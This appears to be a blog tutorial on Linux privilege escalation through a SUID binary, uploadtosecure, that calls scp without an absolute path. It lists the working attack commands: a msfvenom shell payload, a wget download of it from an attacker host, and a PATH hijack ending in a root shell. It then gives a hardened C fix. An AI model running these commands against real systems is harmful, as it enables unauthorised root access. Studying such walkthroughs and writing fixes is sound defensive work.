SUID Binaries Privilege Escalation

SUID Binaries Priv-Esc

Enumerate SUID programs

-rwsr-xr-x 1 root root 26564 2007-01-30 18:10 /bin/ping6
-rwsr-xr-x 1 root root 30736 2007-01-30 18:10 /bin/ping
-rwsr-xr-x 1 root root 76896 2007-02-21 12:48 /bin/mount
-rwsr-xr-x 1 root root 56984 2007-02-21 12:48 /bin/umount
-rwsr-xr-x 1 root root 27000 2007-02-27 02:53 /bin/su
-rwsr-xr-x 1 root root 9580 2007-07-30 16:41 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 142156 2007-03-05 11:38 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 37248 2007-02-27 02:53 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18060 2006-11-23 15:58 /usr/bin/traceroute.lbl
-rwsr-xr-x 1 root root 32064 2007-02-27 02:53 /usr/bin/chfn
-rwsr-sr-x 1 daemon daemon 37800 2006-01-03 02:15 /usr/bin/at
-rwsr-xr-x 1 root root 837304 2007-03-07 17:16 /usr/bin/gpg
-rwsr-xr-x 2 root root 91700 2006-04-15 03:39 /usr/bin/sudo
-rwsr-xr-x 1 root root 6923 2008-10-07 19:38 /usr/local/bin/uploadtosecure

A search shows that uploadtosecure is not a common program, so it may be exploitable

-rwsr-xr-x 1 root root 6923 2008-10-07 19:38 /usr/local/bin/uploadtosecure

Inspect its strings

strings /usr/local/bin/uploadtosecure

Output

/lib/ld-linux.so.2 
__gmon_start__
libc.so.6
_IO_stdin_used
puts
system
__libc_start_main
GLIBC_2.0
PTRh0
[^_]
Archiving files to secure server...
scp -r file/tobesecured/* 10.10.11.100:/var/www/html/files/

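One of the commands calls scp to transfer files. It names scp without an absolute path and the binary imports system, so the lookup goes through the caller's PATH and scp can be hijacked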

scp -r file/tobesecured/* 10.10.11.100:/var/www/html/files/

Generate the exploit binary

msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp

Download it to /tmp and change its permissions

wget http://192.168.0.167/scp -O /tmp/scp

chmod 755 /tmp/scp

Modify PATH

export PATH=/tmp:$PATH

echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/games

Run the binary to trigger the exploit

~$ /usr/local/bin/uploadtosecure

Archiving files to secure server...
sh-3.1# id
uid=1001(bob) gid=1001(bob) euid=0(root) groups=1001(bob)
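
The root cause in the walkthrough above is that the SUID binary hands a bare scp to system(), so the shell resolves it through the caller's PATH. The following is an added example, not code from the original post or the binary's source: a hardened form of the upload that runs scp by absolute path, with a fixed environment and no shell. The names run_trusted, upload and CLEAN_ENV, and the /usr/bin/scp location, are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <glob.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Presumed original (assumption, inferred from strings): system("scp -r ...").
 * system() runs /bin/sh -c, so "scp" is resolved through the caller's $PATH. */
/* Child environment is fixed; nothing is inherited from the invoking user. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Run an absolute-path program without a shell; returns exit status or -1. */
int run_trusted(const char *path, char *const argv[])
{
    if (path == NULL || path[0] != '/')
        return -1;                     /* refuse anything needing a $PATH lookup */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, CLEAN_ENV); /* execve never searches $PATH */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* The page's upload with the glob expanded in-process; scp path is assumed. */
int upload(void)
{
    glob_t g;
    if (glob("file/tobesecured/*", 0, NULL, &g) != 0)
        return -1;                     /* nothing to send, or glob failed */
    char **argv = calloc(g.gl_pathc + 4, sizeof *argv);
    if (argv == NULL) { globfree(&g); return -1; }
    size_t n = 0;
    argv[n++] = "scp";
    argv[n++] = "-r";
    for (size_t i = 0; i < g.gl_pathc; i++)
        argv[n++] = g.gl_pathv[i];
    argv[n++] = "10.10.11.100:/var/www/html/files/";
    int rc = run_trusted("/usr/bin/scp", argv);
    free(argv);
    globfree(&g);
    return rc;
}

int main(void) { return upload() == 0 ? 0 : 1; }
```

If the upload does not need root at all, removing the SUID bit from the binary closes the issue without code changes.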

Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0. Please credit the source when reposting!